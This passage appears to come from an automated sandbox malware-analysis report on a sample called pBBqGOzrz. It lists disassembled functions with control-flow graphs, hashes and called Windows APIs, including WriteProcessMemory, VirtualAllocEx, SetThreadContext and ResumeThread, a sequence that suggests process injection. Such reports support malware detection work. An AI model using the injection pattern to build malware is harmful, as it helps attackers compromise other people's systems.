                                        • Opcode Fuzzy Hash: 7460c5759d1d0b811bd1b5c0473e9f743e678302a81def75c7190fdbef8d9176
                                        • Instruction Fuzzy Hash: B32136B19003499FCB10DFAAC941ADEFBF5FF48324F10842DE958A7251C7389941CBA5
                                        Function 06AC1368 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 882 6ac1368-6ac13b6 884 6ac13b8-6ac13c4 882->884 885 6ac13c6-6ac1405 WriteProcessMemory 882->885 884->885 887 6ac140e-6ac143e 885->887 888 6ac1407-6ac140d 885->888 888->887
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06AC13F8
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: bd862a859a383c7b5695837c153f4b64f4e73e980495c8f32ced29509b6a0b55
                                        • Instruction ID: 42088bf236b90d55c8207796881de0975c8bdb39a46de95564c751c4e59fe965
                                        • Opcode Fuzzy Hash: bd862a859a383c7b5695837c153f4b64f4e73e980495c8f32ced29509b6a0b55
                                        • Instruction Fuzzy Hash: 5F2155B19003499FCB10DFAAC881BDEBBF5FF48324F10842AE918A7351C7789944CBA4
                                        Function 00D2DA40 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D2DACF
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 78efe10e083fac0e9b0c6a9e1adc646a38fa0ba4d5a66217ce3fb80c65c44ded
                                        • Instruction ID: b29bcde97331f1348606021ae307ba129beeae4d7a65ce26162121236f4b64a4
                                        • Opcode Fuzzy Hash: 78efe10e083fac0e9b0c6a9e1adc646a38fa0ba4d5a66217ce3fb80c65c44ded
                                        • Instruction Fuzzy Hash: B321D2B59002589FDB10CFAAD584AEEBFF5EB48324F14846AE954A7311D374A940CFA4
                                        Function 06AC1458 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06AC14D8
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        • Opcode ID: 6e3c0982707f499b5714c0de50c22252e6f4ffbba687073fa423e59793d35980
                                        • Instruction ID: ea1269b23f075e3648359b337083413d410f996dfd4e66e76e67eef22d2e8fd1
                                        • Opcode Fuzzy Hash: 6e3c0982707f499b5714c0de50c22252e6f4ffbba687073fa423e59793d35980
                                        • Instruction Fuzzy Hash: 612128B19002599FCB10DFAAC941ADEFBF5FF48320F10842DE558A7251C7349944CBA4
                                        Function 06AC0960 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06AC09DE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: b110081e4e42b7e61a7efaf8736e0e3454742b4f14480005ea69c8034da640c0
                                        • Instruction ID: 4fbfe825aa8906718a77a30fae1ae8d123a42b50a464c1175a1dbcd548e8f60d
                                        • Opcode Fuzzy Hash: b110081e4e42b7e61a7efaf8736e0e3454742b4f14480005ea69c8034da640c0
                                        • Instruction Fuzzy Hash: 242107B19002098FDB10DFAAC4857EEBBF4AB89324F14842DD459A7241CB789985CFA5
                                        Function 06AC095B Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06AC09DE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: e036a26fd66b9738a65812e21be983d7cd60b5529f540c4d209dd43daaefc5a0
                                        • Instruction ID: 3d5695c65777868c8bef2d55d46121ce8f1f5eff3ebbf91ef674cc5f9a200b18
                                        • Opcode Fuzzy Hash: e036a26fd66b9738a65812e21be983d7cd60b5529f540c4d209dd43daaefc5a0
                                        • Instruction Fuzzy Hash: D02107B19002098FDB50DFAAC4857EEFBF4AF48364F14842ED459A7241C7789985CFA4
                                        Function 00D2DA48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D2DACF
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 33c7015e82ab619a466eb30bd7366b88e1bd20f1ee22802e2add618749c98e19
                                        • Instruction ID: 8871f43a65d5860ff4c0d7d86b5b69d6574e1fecd2b626f3ffc1f71cfe5ce05d
                                        • Opcode Fuzzy Hash: 33c7015e82ab619a466eb30bd7366b88e1bd20f1ee22802e2add618749c98e19
                                        • Instruction Fuzzy Hash: 7B21F3B59002589FDB10CFAAD984ADEFFF9FB48320F14801AE918A3310D374A940CFA4
                                        Function 06AC12A7 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AC1316
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 2cd6e67163ad928886b1b90b8f2504c98858f514e17153623d90f579a73c2723
                                        • Instruction ID: 1bcf3ef424d468a7b1c64fe5fe86973d219b1d7b9386fd2f1f41520dee906b49
                                        • Opcode Fuzzy Hash: 2cd6e67163ad928886b1b90b8f2504c98858f514e17153623d90f579a73c2723
                                        • Instruction Fuzzy Hash: A31156759002489FCB10DFAAC845ADEFFF5EB88324F208419E519A7250C735A940CFA4
                                        Function 06AC12A8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06AC1316
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 381ed6525e104fd653fbcff4c97995c10adeacf00af96815eb9800bc8847ad04
                                        • Instruction ID: da00cd2ca2b066270045f4206ae4380a3aa7525633bb0d1c88c521a2ffde4507
                                        • Opcode Fuzzy Hash: 381ed6525e104fd653fbcff4c97995c10adeacf00af96815eb9800bc8847ad04
                                        • Instruction Fuzzy Hash: 5C1164B29002488FCB10DFAAC844BDEFFF5EF88324F208419E519A7250C735A940CFA4
                                        Function 06AC08AB Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 0e4c53ba3863bf97bede323e2e3d6e853ac253cb7141d5193d9d6fa66116c025
                                        • Instruction ID: 22c971474384f74ee9e409fd5e15139f6de3db9c1a08ccde875fffb51ace5a24
                                        • Opcode Fuzzy Hash: 0e4c53ba3863bf97bede323e2e3d6e853ac253cb7141d5193d9d6fa66116c025
                                        • Instruction Fuzzy Hash: 481128B19002488FDB20DFAAC8457DFFBF9EB88324F24841DD459A7250CB79A944CBA5
                                        Function 06AC4FE8 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06AC504D
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: 511aadd64900e059562d242722bd1d1b3a5ed6bbed11cd5c33c77b8ae878354e
                                        • Instruction ID: 5f33f3341c2fda19cb85ab0cef614635ad43d3eb22100e6643883c6c24ec72d7
                                        • Opcode Fuzzy Hash: 511aadd64900e059562d242722bd1d1b3a5ed6bbed11cd5c33c77b8ae878354e
                                        • Instruction Fuzzy Hash: 0711F5B98002489FDB20DF9AD845BDEFBF8EB48324F108419E558A7611C375A584CFA1
                                        Function 06AC08B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 208c1abd686f87cc633dd287155138a6b9dab87511b03347da3f2df102033c8a
                                        • Instruction ID: 5bb484253323002be0df29345efcc51bb0305d10375d5a35de6c085d3247ed8f
                                        • Opcode Fuzzy Hash: 208c1abd686f87cc633dd287155138a6b9dab87511b03347da3f2df102033c8a
                                        • Instruction Fuzzy Hash: 2D1136B1D002488FDB20DFAAC4457EEFBF4EB88324F20842DD459A7250CB75A944CFA4
                                        Function 06AC3264 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 06AC504D
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1844645407.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_6ac0000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        • Opcode ID: ce12e75a07fdba06fa770b545dfeb5baee8961ce7a9207e87072a94e8d5c384b
                                        • Instruction ID: 264d2ec532e43cb0afc75bc1583da9967224269e1506fef6362e98506fdccdf6
                                        • Opcode Fuzzy Hash: ce12e75a07fdba06fa770b545dfeb5baee8961ce7a9207e87072a94e8d5c384b
                                        • Instruction Fuzzy Hash: 7D11F5B58003499FDB10DF9AD889BDEBBF8EB48324F108419E555A7250C375A944CFE5
                                        Function 00D2B358 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00D2B3BE
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1840078036.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_d20000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 644c1036fd2de326dc9b031d61480b9c9773da36669ce9e6e3df6da12a5874d1
                                        • Instruction ID: 0de08a860dc229b7f44b58fb76e71e9a90d5beb0fcd3bb2da66bee8ab85ad560
                                        • Opcode Fuzzy Hash: 644c1036fd2de326dc9b031d61480b9c9773da36669ce9e6e3df6da12a5874d1
                                        • Instruction Fuzzy Hash: 3111E0B5C002598FCB10DF9AD444ADEFBF4AF88324F14846AD459A7610C3B5A545CFA5
                                        Function 0092D1FC Relevance: .1, Instructions: 76COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1839775530.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_92d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d035acc6dd1e44ca8db808c0d7715a04445e56668ff6e77ee87b93a8a6e1f9f6
                                        • Instruction ID: 90365531e2f31c869ba5f1f4236b0ed2c020c5c74db1161701701f49e4562448
                                        • Opcode Fuzzy Hash: d035acc6dd1e44ca8db808c0d7715a04445e56668ff6e77ee87b93a8a6e1f9f6
                                        • Instruction Fuzzy Hash: 9B210371504240DFDB05DF14E9C4B2ABF69FB88314F20C569ED194B25AC33AD816CBA1
                                        Function 0093D01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1839862207.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_93d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 69d5a7294cf00ce3248ad916411ce25743b9baab3957838f0442c0bb0d3b4548
                                        • Instruction ID: f2f8f8aa0c3dab5dd7159a058ef86b1fac5c9bccc4129195345cf59cf7077ec5
                                        • Opcode Fuzzy Hash: 69d5a7294cf00ce3248ad916411ce25743b9baab3957838f0442c0bb0d3b4548
                                        • Instruction Fuzzy Hash: B1210775504200DFDB18DF14E5D4B26BFA5FB84714F20C96DD8494B256C33AD847CE61
                                        Function 0093D006 Relevance: .1, Instructions: 62COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1839862207.000000000093D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0093D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_93d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4da8e6faaf913d6cf277a410e8c71385abbc514630f9bc3597f65cc33c4945cf
                                        • Instruction ID: ae9632d955f4a0db7e1a830027a01e1835b3838b9a15dcae1d4849ee289ff2cd
                                        • Opcode Fuzzy Hash: 4da8e6faaf913d6cf277a410e8c71385abbc514630f9bc3597f65cc33c4945cf
                                        • Instruction Fuzzy Hash: CC218E755093808FCB06CF24D9A4715BF71EB46314F28C5EAD8498F2A7C33A980ACB62
                                        Function 0092D1F7 Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1839775530.000000000092D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0092D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_92d000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                        • Instruction ID: 5f568a84108fc4ed895fb234962345ed9a43d078fafc4dbc2df52b7fa1b1c46b
                                        • Opcode Fuzzy Hash: d4a9c2a4520ad29cc5014b186a1537c42efb92585eeaa8902cc1b22a323ac8e1
                                        • Instruction Fuzzy Hash: 8221B176504240DFDB06CF50D9C4B56BF72FB94314F24C5A9DD090B65AC33AD82ACBA1

                                        Execution Graph

                                        Execution Coverage:12%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:20
                                        Total number of Limit Nodes:4
                                        execution_graph 25859 18c0848 25861 18c084e 25859->25861 25860 18c091b 25861->25860 25863 18c1340 25861->25863 25865 18c1343 25863->25865 25864 18c1454 25864->25861 25865->25864 25867 18c8219 25865->25867 25868 18c8223 25867->25868 25869 18c82d9 25868->25869 25872 708fa70 25868->25872 25876 708fa80 25868->25876 25869->25865 25873 708fa95 25872->25873 25874 708fca6 25873->25874 25875 708fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 25873->25875 25874->25869 25875->25873 25877 708fa95 25876->25877 25878 708fca6 25877->25878 25879 708fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx 25877->25879 25878->25869 25879->25877 25880 18c8040 25881 18c8086 DeleteFileW 25880->25881 25883 18c80bf 25881->25883

                                        Executed Functions

                                        Function 07083578 Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 125 7083578-7083599 126 708359b-708359e 125->126 127 7083d3f-7083d42 126->127 128 70835a4-70835c3 126->128 129 7083d68-7083d6a 127->129 130 7083d44-7083d63 127->130 138 70835dc-70835e6 128->138 139 70835c5-70835c8 128->139 132 7083d6c 129->132 133 7083d71-7083d74 129->133 130->129 132->133 133->126 135 7083d7a-7083d83 133->135 143 70835ec-70835fb 138->143 139->138 140 70835ca-70835da 139->140 140->143 254 70835fd call 7083d98 143->254 255 70835fd call 7083d93 143->255 144 7083602-7083607 145 7083609-708360f 144->145 146 7083614-70838f1 144->146 145->135 167 7083d31-7083d3e 146->167 168 70838f7-70839a6 146->168 177 70839a8-70839cd 168->177 178 70839cf 168->178 179 70839d8-70839eb call 7082370 177->179 178->179 183 7083d18-7083d24 179->183 184 70839f1-7083a13 call 708237c 179->184 183->168 185 7083d2a 183->185 184->183 188 7083a19-7083a23 184->188 185->167 188->183 189 7083a29-7083a34 188->189 189->183 190 7083a3a-7083b10 189->190 202 7083b1e-7083b4e 190->202 203 7083b12-7083b14 190->203 207 7083b5c-7083b68 202->207 208 7083b50-7083b52 202->208 203->202 209 7083bc8-7083bcc 207->209 210 7083b6a-7083b6e 207->210 208->207 211 7083d09-7083d12 209->211 212 7083bd2-7083c0e 209->212 210->209 213 7083b70-7083b9a 210->213 211->183 211->190 224 7083c1c-7083c2a 212->224 225 7083c10-7083c12 212->225 220 7083ba8-7083bc5 call 7082388 213->220 221 7083b9c-7083b9e 213->221 220->209 221->220 228 7083c2c-7083c37 224->228 229 7083c41-7083c4c 224->229 225->224 228->229 234 7083c39 228->234 232 7083c4e-7083c54 229->232 233 7083c64-7083c75 229->233 235 7083c58-7083c5a 232->235 236 7083c56 232->236 238 7083c8d-7083c99 233->238 239 7083c77-7083c7d 233->239 234->229 235->233 236->233 243 7083c9b-7083ca1 238->243 244 7083cb1-7083d02 238->244 240 7083c7f 239->240 241 7083c81-7083c83 239->241 240->238 241->238 245 7083ca3 243->245 246 7083ca5-7083ca7 243->246 244->211 245->244 246->244 254->144 255->144
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: 9fde80074ef808c3b44b1d6f698a51d5348587594223521daed4992ed92b4b06
                                        • Instruction ID: 6cc73d537c9756a8fba56e378c56c7b3aa1fefa440230f561494f05d5d193aa9
                                        • Opcode Fuzzy Hash: 9fde80074ef808c3b44b1d6f698a51d5348587594223521daed4992ed92b4b06
                                        • Instruction Fuzzy Hash: CC322E71E1071A8FCB54EF69C89459DF7B5FFC9700F1086AAD449AB224EB309D85CB81
                                        Function 07087E90 Relevance: 3.0, Strings: 2, Instructions: 475COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 800 7087e90-7087eae 801 7087eb0-7087eb3 800->801 802 7087ed4-7087ed7 801->802 803 7087eb5-7087ecf 801->803 804 7087ed9-7087ee7 802->804 805 7087eee-7087ef1 802->805 803->802 815 7087ee9 804->815 816 7087f36-7087f4c 804->816 806 7087ef3-7087f0f 805->806 807 7087f14-7087f17 805->807 806->807 810 7087f19-7087f23 807->810 811 7087f24-7087f26 807->811 812 7087f28 811->812 813 7087f2d-7087f30 811->813 812->813 813->801 813->816 815->805 820 7087f52-7087f5b 816->820 821 7088167-7088171 816->821 822 7087f61-7087f7e 820->822 823 7088172-70881a7 820->823 830 7088154-7088161 822->830 831 7087f84-7087fac 822->831 826 70881a9-70881ac 823->826 828 70883e1-70883e4 826->828 829 70881b2-70881c1 826->829 832 70883e6-7088402 828->832 833 7088407-708840a 828->833 837 70881e0-7088224 829->837 838 70881c3-70881de 829->838 830->820 830->821 831->830 851 7087fb2-7087fbb 831->851 832->833 835 7088410-708841c 833->835 836 70884b5-70884b7 833->836 843 7088427-7088429 835->843 839 70884b9 836->839 840 70884be-70884c1 836->840 856 708822a-708823b 837->856 857 70883b5-70883cb 837->857 838->837 839->840 840->826 844 70884c7-70884d0 840->844 847 708842b-7088431 843->847 848 7088441-7088445 843->848 852 7088433 847->852 853 7088435-7088437 847->853 854 7088453 848->854 855 7088447-7088451 848->855 851->823 858 7087fc1-7087fdd 851->858 852->848 853->848 860 7088458-708845a 854->860 855->860 866 70883a0-70883af 856->866 867 7088241-708825e 856->867 857->828 870 7088142-708814e 858->870 871 7087fe3-708800d 858->871 862 708846b-70884a4 860->862 863 708845c-708845f 860->863 862->829 883 70884aa-70884b4 862->883 863->844 866->856 866->857 867->866 877 7088264-708835a call 70866b0 867->877 870->830 870->851 884 7088138-708813d 871->884 885 7088013-708803b 871->885 933 7088368 877->933 934 708835c-7088366 877->934 884->870 885->884 891 7088041-708806f 885->891 891->884 897 7088075-708807e 891->897 897->884 898 7088084-70880b6 897->898 906 70880b8-70880bc 898->906 907 70880c1-70880dd 898->907 906->884 910 70880be 906->910 907->870 908 70880df-7088136 call 70866b0 907->908 908->870 910->907 935 708836d-708836f 933->935 934->935 935->866 936 7088371-7088376 935->936 937 7088378-7088382 936->937 938 7088384 936->938 939 7088389-708838b 937->939 938->939 939->866 940 708838d-7088399 939->940 940->866
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 72633ce853905cc8b49b2554d9fe71c947a0207b2da436b24591c8045c03ef7d
                                        • Instruction ID: f329adae5e9cd26f1e1574ddc718859cb80bd0a42dbd689e477a99181315bff1
                                        • Opcode Fuzzy Hash: 72633ce853905cc8b49b2554d9fe71c947a0207b2da436b24591c8045c03ef7d
                                        • Instruction Fuzzy Hash: B902AE70B102068FCB94EB68D590A6EB7E6FF84304F64C629D449DB395DB35EC86CB81
                                        Function 070856A8 Relevance: 1.8, Strings: 1, Instructions: 594COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: a494568a08f40fa12a87bb72539fb856bcfa4850b3a40ccca425e5f48e145f88
                                        • Instruction ID: f565d1df552d368c962d89e715893523aab9dfc72578d32f6ec57cce20c7a39c
                                        • Opcode Fuzzy Hash: a494568a08f40fa12a87bb72539fb856bcfa4850b3a40ccca425e5f48e145f88
                                        • Instruction Fuzzy Hash: 7D22C4B1E002168FDBA0EB64C8846AEB7F2FF85324F108569D899AB344DB31DD55CB91
                                        Function 0708274B Relevance: 1.0, Instructions: 1050COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 989bc8fc558b01a65bbce7c9531d84ebda67723bd1c43eb031f2cef866061645
                                        • Instruction ID: 04c680bbc14f265cc28445ed6c5479e782b5bc54f93b23481d369e88e112be2b
                                        • Opcode Fuzzy Hash: 989bc8fc558b01a65bbce7c9531d84ebda67723bd1c43eb031f2cef866061645
                                        • Instruction Fuzzy Hash: C7A23674A002098FDBA4EB68C584B5DBBF2FF89314F1486A9D4899B361DB35EC85CF41
                                        Function 07086700 Relevance: .8, Instructions: 822COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9b646ea6ad233c66f212f3b7536d76242e4eda1acdc0eba53f33b57ca4a2145c
                                        • Instruction ID: e68eb44be9e6c4af36e398928ce0da04e1b4f785621717bb54fcf33d6c287de6
                                        • Opcode Fuzzy Hash: 9b646ea6ad233c66f212f3b7536d76242e4eda1acdc0eba53f33b57ca4a2145c
                                        • Instruction Fuzzy Hash: D462B070A002058FCB94EBA8D594BADB7F2FF84314F258569D44ADB391DB36EC46CB81
                                        Function 0708B343 Relevance: .6, Instructions: 573COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.4194887476.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7080000_pBBqGOzrz.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 798364ba4b3bd4e7f65d9017fcf82f8bfe032bc788b1f332b4bdae3219a00a2c
                                        • Instruction ID: c92650620f44c56d13b3462b08fe18b23f5adbbf3b201db0a01e840d7d463d92
                                        • Opcode Fuzzy Hash: 798364ba4b3bd4e7f65d9017fcf82f8bfe032bc788b1f332b4bdae3219a00a2c
                                        • Instruction Fuzzy Hash: D32251F0A0020A9FDFA4EB6CD4807ADB7F5EB45310F248626E495EB395DA34DC85CB51
                                        Function 0708ADE0 Relevance: 10.4, Strings: 8, Instructions: 393COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
